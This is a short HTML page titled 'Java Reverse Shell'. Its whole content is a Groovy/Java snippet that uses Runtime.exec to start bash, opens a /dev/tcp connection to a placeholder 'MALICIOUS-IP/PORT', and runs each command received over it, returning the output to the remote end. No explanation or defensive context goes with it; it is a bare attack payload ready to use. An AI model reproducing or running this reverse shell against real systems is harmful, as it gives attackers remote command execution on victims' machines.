<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Java Reverse Shell</title>
</head><body>r = Runtime.getRuntime()<br/>
p = r.exec(["/bin/bash","-c","exec 5&lt;&gt;/dev/tcp/MALICIOUS-IP/PORT;cat &lt;&amp;5 | while read line; do \$line 2&gt;&amp;5 &gt;&amp;5; done"] as String[])<br/>
p.waitFor()</body></html>